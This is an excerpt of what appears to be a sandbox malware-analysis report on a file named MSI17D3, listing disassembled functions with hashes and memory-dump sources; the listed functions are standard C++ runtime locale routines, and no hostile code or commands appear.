                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                                                                                                                • API String ID: 1452528299-1782174991
                                                                                                                                                                                • Opcode ID: 0c4fc960f4afaaac0c8e66a677170a1c70259792972f53fac299d86be4fb55e0
                                                                                                                                                                                • Instruction ID: 45b386b7dc46124baec8a118b095f6da50c839a1ffd6b2550dd1c6ca0b5d7bf2
                                                                                                                                                                                • Opcode Fuzzy Hash: 0c4fc960f4afaaac0c8e66a677170a1c70259792972f53fac299d86be4fb55e0
                                                                                                                                                                                • Instruction Fuzzy Hash: AB118E16A5062687CB302F6C98003BAA2E4DF50764F65047FDC89D73D1E6AA8D8187A4
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Maklocstr$Maklocchr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2020259771-0
                                                                                                                                                                                • Opcode ID: 5cfecc72b28a4f8800d092ad003c4dc561667bfe12fd0b3772c1a86438e7eb26
                                                                                                                                                                                • Instruction ID: 3a65eb863d187ffb36f05877ca19b2e3822e55d42d26337a19de8095a7d0c796
                                                                                                                                                                                • Opcode Fuzzy Hash: 5cfecc72b28a4f8800d092ad003c4dc561667bfe12fd0b3772c1a86438e7eb26
                                                                                                                                                                                • Instruction Fuzzy Hash: D911CEB1940784BFE720DBA6C881F12BBECAF06310F08051DFA59CBA42C264FD9087A5
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CBD883
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CBD88D
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • numpunct.LIBCPMT ref: 00CBD8C7
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CBD8DE
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CBD8FE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 743221004-0
                                                                                                                                                                                • Opcode ID: ad9627526c3c0336e47e127386473643ce2b08e44b9e0cd074fadb9269ea4aa9
                                                                                                                                                                                • Instruction ID: 3304a363da71b710b3003cd66f27a1a354022943e0576b8c846b0e4b6db6443f
                                                                                                                                                                                • Opcode Fuzzy Hash: ad9627526c3c0336e47e127386473643ce2b08e44b9e0cd074fadb9269ea4aa9
                                                                                                                                                                                • Instruction Fuzzy Hash: DD11CB35900219EBCF09EBA4D841BFE7765AF94311F24085EE512AB3E1DF709E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2396
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC23A0
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • codecvt.LIBCPMT ref: 00CC23DA
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC23F1
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2411
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 712880209-0
                                                                                                                                                                                • Opcode ID: 388a0f40b720bc734e7d74d42caa06968aa7cf9ad725153314d76e6506f7affa
                                                                                                                                                                                • Instruction ID: fa2e234de65d13956cb376ec3f9cc2783a07b4333e97ec4bf37a8833ce592e82
                                                                                                                                                                                • Opcode Fuzzy Hash: 388a0f40b720bc734e7d74d42caa06968aa7cf9ad725153314d76e6506f7affa
                                                                                                                                                                                • Instruction Fuzzy Hash: BF01C035900219DFCB09EBA4D841FBE77A5AF80710F24040EE511AB392CF749E45DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC24C0
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC24CA
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • collate.LIBCPMT ref: 00CC2504
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC251B
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC253B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1007100420-0
                                                                                                                                                                                • Opcode ID: 917e4ae493abe500b7559644888a51d1c3bc31cf5f343f222178d6919e763a6f
                                                                                                                                                                                • Instruction ID: 56de8c058a358d6d373f49dae2998d08cc0ed6c72d49e27f688919b9a6cfd2f6
                                                                                                                                                                                • Opcode Fuzzy Hash: 917e4ae493abe500b7559644888a51d1c3bc31cf5f343f222178d6919e763a6f
                                                                                                                                                                                • Instruction Fuzzy Hash: C601C031900219DBCB09EBA4E845BBE7765AF84720F24040EF510AB391CF30DE01EBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC242B
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2435
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • collate.LIBCPMT ref: 00CC246F
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2486
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC24A6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1007100420-0
                                                                                                                                                                                • Opcode ID: 06731cae5cd3ae8d6693a1a98814414989231650e83ced5f260de9262c0773d4
                                                                                                                                                                                • Instruction ID: e28833f2cbbb87e96e24fd6fd18a8f49ed53a9892af63b807b200b3c02200c96
                                                                                                                                                                                • Opcode Fuzzy Hash: 06731cae5cd3ae8d6693a1a98814414989231650e83ced5f260de9262c0773d4
                                                                                                                                                                                • Instruction Fuzzy Hash: AF01C431900215DFCB09EBA0E841BBE7B65AF84710F24040EF510673D2DF709E44DBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC25EA
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC25F4
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • messages.LIBCPMT ref: 00CC262E
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2645
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2665
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2750803064-0
                                                                                                                                                                                • Opcode ID: 218d203a210672b0f617c8a2a64fe1ba817ee5ea41393434f12585eb45660266
                                                                                                                                                                                • Instruction ID: 3af5aba8e18b6169326d00dab165c95beff0be84a1085418364e2946552add4e
                                                                                                                                                                                • Opcode Fuzzy Hash: 218d203a210672b0f617c8a2a64fe1ba817ee5ea41393434f12585eb45660266
                                                                                                                                                                                • Instruction Fuzzy Hash: 4101C035900219DBCB05EBA0E815FBE7BA5AF84710F24440EF510AB392CF709E00DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2555
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC255F
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • ctype.LIBCPMT ref: 00CC2599
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC25B0
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC25D0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 83828444-0
                                                                                                                                                                                • Opcode ID: abfdcb912c489ffd147cd412facf139e9729145ae88a20b35a31a47d633fc348
                                                                                                                                                                                • Instruction ID: 7ba75cb9a13f561a45740046ce4104d03b395e96e0f75fb69d825ea7837e5d55
                                                                                                                                                                                • Opcode Fuzzy Hash: abfdcb912c489ffd147cd412facf139e9729145ae88a20b35a31a47d633fc348
                                                                                                                                                                                • Instruction Fuzzy Hash: 0301C075900259DBCB05EBA0D851FBE7765AF84320F24040EE511AB392DF309E45DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC267F
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2689
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • messages.LIBCPMT ref: 00CC26C3
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC26DA
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC26FA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2750803064-0
                                                                                                                                                                                • Opcode ID: e7451501a5164392cfa1c2ac51107c1468d0932a22effa1f12f7fa28a801cb7a
                                                                                                                                                                                • Instruction ID: 2d961c90f792118e649e3d94cbf919f56690e63bd4abb33b41ee950bbde07067
                                                                                                                                                                                • Opcode Fuzzy Hash: e7451501a5164392cfa1c2ac51107c1468d0932a22effa1f12f7fa28a801cb7a
                                                                                                                                                                                • Instruction Fuzzy Hash: E701C071900219DFCB15EBA4D841BBEB765AF84310F24440EF610AB392CF709E01EBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CCE8DF
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CCE8E9
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • messages.LIBCPMT ref: 00CCE923
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CCE93A
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CCE95A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2750803064-0
                                                                                                                                                                                • Opcode ID: a76914d9aae49e5b6dbd2806f03fcda595598a2b1972b18ad86d936943efa8d0
                                                                                                                                                                                • Instruction ID: 238d84d2f335e3452782c63ef52938457477b318bfe7039a1726f33131aca48d
                                                                                                                                                                                • Opcode Fuzzy Hash: a76914d9aae49e5b6dbd2806f03fcda595598a2b1972b18ad86d936943efa8d0
                                                                                                                                                                                • Instruction Fuzzy Hash: 52018C71900259DFCB05EBA4D841BFE7BA5BF85720F25050EE614AB392CF749E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CCE84A
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CCE854
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • collate.LIBCPMT ref: 00CCE88E
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CCE8A5
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CCE8C5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1007100420-0
                                                                                                                                                                                • Opcode ID: 13df91c164a89fdb1ed9220e190d4b5cfb969e0802cede977eb139a5b23a39f4
                                                                                                                                                                                • Instruction ID: 07cbcf326532addaaabdff2d3c16ace61ae97930e93b823a7f8344eeb22f42de
                                                                                                                                                                                • Opcode Fuzzy Hash: 13df91c164a89fdb1ed9220e190d4b5cfb969e0802cede977eb139a5b23a39f4
                                                                                                                                                                                • Instruction Fuzzy Hash: B401AD76900219DBCB05EBA8D801BAE77A5AF85710F24440EE511AB3D2CF309E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC29FD
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2A07
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • moneypunct.LIBCPMT ref: 00CC2A41
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2A58
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2A78
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 419941038-0
                                                                                                                                                                                • Opcode ID: 2ed957537f2a2648807ce9d804cc316be4231014cb41274ae9e60766923ebd7a
                                                                                                                                                                                • Instruction ID: e3483cc3683cf2fee6504440497a4d7b928b541a020192675a105d9efdbb5cb4
                                                                                                                                                                                • Opcode Fuzzy Hash: 2ed957537f2a2648807ce9d804cc316be4231014cb41274ae9e60766923ebd7a
                                                                                                                                                                                • Instruction Fuzzy Hash: 8501D271900219DFCB15EBA4D845BBE77A5AF84710F24050EF510AB392CF309E01EBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2968
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2972
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • moneypunct.LIBCPMT ref: 00CC29AC
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC29C3
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC29E3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 419941038-0
                                                                                                                                                                                • Opcode ID: 3b223355de0bba1e468963b2214ac813a1dd903f2920aebf4d1d5a86cee18007
                                                                                                                                                                                • Instruction ID: a6c7761e10eb6d7abbf62c594bb21d449149c287d98e70ac1c7f9b45ee2e3e2c
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b223355de0bba1e468963b2214ac813a1dd903f2920aebf4d1d5a86cee18007
                                                                                                                                                                                • Instruction Fuzzy Hash: FC018071900219DBCB15EBA4D842BBE7765AF84710F24450EE515AB392DF709E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2A92
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2A9C
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • moneypunct.LIBCPMT ref: 00CC2AD6
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2AED
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2B0D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 419941038-0
                                                                                                                                                                                • Opcode ID: 6b0b11d7e9c7f50697c2f7ef2bd038743554d2b1a22fcb883b091d86e65c37b0
                                                                                                                                                                                • Instruction ID: 16a07b7797598705affcd310f7501647565e5daf932da680136576a073ec6758
                                                                                                                                                                                • Opcode Fuzzy Hash: 6b0b11d7e9c7f50697c2f7ef2bd038743554d2b1a22fcb883b091d86e65c37b0
                                                                                                                                                                                • Instruction Fuzzy Hash: 3101C071900219DFCB15EFA4D851FBEB765AF84720F24480EE615AB392CF709E01DBA2
                                                                                                                                                                                APIs
